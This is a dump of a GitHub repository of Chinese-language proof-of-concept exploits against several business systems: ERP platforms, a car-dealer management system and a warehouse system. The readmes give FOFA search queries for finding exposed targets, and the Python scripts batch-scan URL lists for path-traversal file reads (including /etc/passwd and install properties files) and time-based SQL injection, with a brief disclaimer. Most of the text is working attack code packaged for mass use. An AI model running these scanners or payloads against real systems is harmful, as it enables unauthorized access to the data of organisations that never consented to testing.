4 | 5 | app="用友-U8-Cloud" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240415王道汽车4S企业管理系统 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240415王道汽车4S企业管理系统 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240415王道汽车4S企业管理系统 SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 王道汽车4S企业管理系统 SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | body="PixelsPerInch" && body="AxBorderStyle" && body="DropTarget" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = 
"/appPatchDownLoad?fileName=../../../../RebeeCRM/_RebeeCRM_installation/installvariables.properties" 40 | url = target + path 41 | headers = { 42 | "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", 43 | "Connection": "close", 44 | "Accept-Encoding": "gzip, deflate", 45 | } 46 | 47 | try: 48 | # conn = http.client.HTTPConnection(target) 49 | # conn.request("POST", path, body.encode("utf-8"), headers) 50 | # response1 = conn.getresponse() 51 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 52 | 53 | if response1.status_code == 200 : 54 | print(f"[++++++] {target} 存在任意文件读取") 55 | # print("响应体内容:", response1.text) 56 | with open("result.txt", "a+", encoding="utf-8") as f: 57 | f.write(target + "\n") 58 | else: 59 | print(f"[-] {target} 未发现") 60 | 61 | except Exception as e: 62 | print(f"[*] {target} error: {str(e)}") 63 | 64 | 65 | def extract_host(url): 66 | """ 67 | 从 URL 中提取主机地址和端口号,返回 (host, port) 68 | """ 69 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 70 | if match: 71 | prefix, host, port = match.groups() 72 | if not port: 73 | if prefix and "https" in prefix: 74 | port = "443" 75 | else: 76 | port = "80" 77 | return host, int(port) 78 | else: 79 | return None, None 80 | 81 | 82 | def main(): 83 | banner() 84 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 85 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 86 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 87 | args = parser.parse_args() 88 | 89 | if args.url and not args.file: 90 | if "https://" in args.url or "http://" in args.url: 91 | url = args.url 92 | else: 93 | host, port = extract_host(args.url) 94 | url = f"http://{host}:{port}" 95 | poc(url) 96 | 97 | elif args.url is None and args.file is not None: 98 | url_list = [] 99 | with open(args.file, "r", 
encoding="utf-8") as f: 100 | for url in f.readlines(): 101 | url = url.strip().replace("\n", "") 102 | if "https://" in url or "http://" in url: 103 | url = url 104 | else: 105 | host, port = extract_host(url) 106 | url = f"http://{host}:{port}" 107 | url_list.append(url) 108 | 109 | pool = Pool(10) 110 | pool.map(poc, url_list) 111 | pool.close() 112 | pool.join() 113 | 114 | else: 115 | parser.print_help() 116 | 117 | 118 | if __name__ == '__main__': 119 | main() 120 | -------------------------------------------------------------------------------- /20240416睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 睿贝外贸ERP appPatchDownLoad 任意文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | body="loginNeedMobileNumVerification" || body="睿贝软件" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240419jeevms 仓库管理系统 fileread文件读取漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from 
rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a jeevms 仓库管理系统 fileread文件读取漏洞 poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = "/systemController/showOrDownByurl.do?down=&dbPath=../../../../../../etc/passwd" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' 43 | } 44 | 45 | try: 46 | # conn = http.client.HTTPConnection(target) 47 | # conn.request("POST", path, body.encode("utf-8"), headers) 48 | # response1 = conn.getresponse() 49 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 50 | 51 | if response1.status_code == 200 and "root" in response1.text: 52 | print(f"[++++++] {target} 存在任意文件读取") 53 | # print("响应体内容:", response1.text) 54 | with open("result.txt", "a+", encoding="utf-8") as f: 55 | f.write(target + "\n") 56 | else: 57 | print(f"[-] {target} 未发现") 58 | 59 | except Exception as e: 60 | print(f"[*] {target} error: {str(e)}") 61 | 62 | 63 | def extract_host(url): 64 | """ 65 | 从 URL 中提取主机地址和端口号,返回 (host, port) 66 | """ 67 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 68 | if match: 69 | prefix, host, port = match.groups() 70 | if not port: 71 | if prefix and "https" in prefix: 72 | port = "443" 73 | else: 74 | port = "80" 75 | return host, int(port) 76 | else: 77 | return None, None 78 | 79 | 
80 | def main(): 81 | banner() 82 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 83 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 84 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 85 | args = parser.parse_args() 86 | 87 | if args.url and not args.file: 88 | if "https://" in args.url or "http://" in args.url: 89 | url = args.url 90 | else: 91 | host, port = extract_host(args.url) 92 | url = f"http://{host}:{port}" 93 | poc(url) 94 | 95 | elif args.url is None and args.file is not None: 96 | url_list = [] 97 | with open(args.file, "r", encoding="utf-8") as f: 98 | for url in f.readlines(): 99 | url = url.strip().replace("\n", "") 100 | if "https://" in url or "http://" in url: 101 | url = url 102 | else: 103 | host, port = extract_host(url) 104 | url = f"http://{host}:{port}" 105 | url_list.append(url) 106 | 107 | pool = Pool(10) 108 | pool.map(poc, url_list) 109 | pool.close() 110 | pool.join() 111 | 112 | else: 113 | parser.print_help() 114 | 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /20240419jeevms 仓库管理系统 fileread文件读取漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # jeevms 仓库管理系统 fileread文件读取漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 
4 | 5 | fofa:body="plug-in/lhgDialog/lhgdialog.min.js?skin=metro" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/y1hub/poc_exp/2398dd76ffeb286912187a4cbcce23b868002ac7/20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/assets/Snipaste_2024-04-07_21-14-08.png -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/poc.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import argparse 3 | import base64 4 | import re 5 | import sys 6 | import json 7 | from multiprocessing.dummy import Pool 8 | import requests 9 | import urllib3 10 | import hashlib 11 | from rich.console import Console 12 | 13 | urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) 14 | 15 | 16 | def banner(): 17 | test = """ 18 | 8b d8 88 88 a8P 88 888b 88 ,ad8888ba, 19 | Y8, ,8P ,d88 88 ,88' ,d88 8888b 88 d8"' `"8b 20 | Y8, ,8P 888888 88 ,88" 888888 88 `8b 88 d8' 21 | "8aa8" 88 88,d88' 88 88 `8b 88 88 22 | `88' 88 8888"88, 88 88 `8b 88 88 88888 23 | 88 88 88P Y8b 88 88 `8b 88 Y8, 88 24 | 88 88 88 "88, 88 88 `888 `"Y88888P" 25 | 26 | 888888888888 27 | 28 | tag: this is a 月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞poc 29 | @version: 1.0.0 @author: Y1_K1NG 30 | """ 31 | print(test) 32 | 33 | 34 | def poc(target): 35 | if target[-1] == '/': 36 | target = target[:-1] 37 | else: 38 | target = target 39 | path = 
"/Page/SalerManager/StarryQuoteEdit.aspx?id=1;WAITFOR+DELAY+'0:0:3'--" 40 | url = target + path 41 | headers = { 42 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36' 43 | } 44 | 45 | try: 46 | # conn = http.client.HTTPConnection(target) 47 | # conn.request("POST", path, body.encode("utf-8"), headers) 48 | # response1 = conn.getresponse() 49 | response1 = requests.get(url=url, headers=headers, verify=False, timeout=15) 50 | 51 | if response1.status_code == 200 and response1.elapsed.total_seconds() > 2: 52 | print(f"[++++++] {target} 存在sql") 53 | # print("响应体内容:", response1.text) 54 | with open("result.txt", "a+", encoding="utf-8") as f: 55 | f.write(target + "\n") 56 | else: 57 | print(f"[-] {target} 未发现") 58 | 59 | except Exception as e: 60 | print(f"[*] {target} error: {str(e)}") 61 | 62 | 63 | def extract_host(url): 64 | """ 65 | 从 URL 中提取主机地址和端口号,返回 (host, port) 66 | """ 67 | match = re.search(r"(http://|https://)?([\w\.]+):?(\d+)?", url) 68 | if match: 69 | prefix, host, port = match.groups() 70 | if not port: 71 | if prefix and "https" in prefix: 72 | port = "443" 73 | else: 74 | port = "80" 75 | return host, int(port) 76 | else: 77 | return None, None 78 | 79 | 80 | def main(): 81 | banner() 82 | parser = argparse.ArgumentParser(description='任何问题+V y1k1ng1227') 83 | parser.add_argument("-u", "--url", dest="url", type=str, help=" example: http://www.example.com") 84 | parser.add_argument("-f", "--file", dest="file", type=str, help=" urls.txt") 85 | args = parser.parse_args() 86 | 87 | if args.url and not args.file: 88 | if "https://" in args.url or "http://" in args.url: 89 | url = args.url 90 | else: 91 | host, port = extract_host(args.url) 92 | url = f"http://{host}:{port}" 93 | poc(url) 94 | 95 | elif args.url is None and args.file is not None: 96 | url_list = [] 97 | with open(args.file, "r", encoding="utf-8") as f: 98 | for url in f.readlines(): 99 | url = 
url.strip().replace("\n", "") 100 | if "https://" in url or "http://" in url: 101 | url = url 102 | else: 103 | host, port = extract_host(url) 104 | url = f"http://{host}:{port}" 105 | url_list.append(url) 106 | 107 | pool = Pool(10) 108 | pool.map(poc, url_list) 109 | pool.close() 110 | pool.join() 111 | 112 | else: 113 | parser.print_help() 114 | 115 | 116 | if __name__ == '__main__': 117 | main() 118 | -------------------------------------------------------------------------------- /20240420月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞/readme.md: -------------------------------------------------------------------------------- 1 | # 月子会所ERP管理云平台 StarryQuoteEdit.aspx接口处存在 SQL注入漏洞 2 | 3 | 免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与作者无关。该文章仅供学习用途使用!!! 4 | 5 | fofa:body="月子护理ERP管理平台" || body="妈妈宝盒客户端.rar" || body="Page/Login/Login3.aspx" 6 | 7 | 批量poc(记得安装库) 8 | 9 | pip install argparse requests rich 10 | 11 | 12 | 13 | 14 | 15 | python poc.py -u 16 | 17 | python poc.py -f .txt 18 | 19 | 结果保存至result.txt 20 | 21 | ![Snipaste_2024-04-07_21-14-08](assets/Snipaste_2024-04-07_21-14-08.png) 22 | --------------------------------------------------------------------------------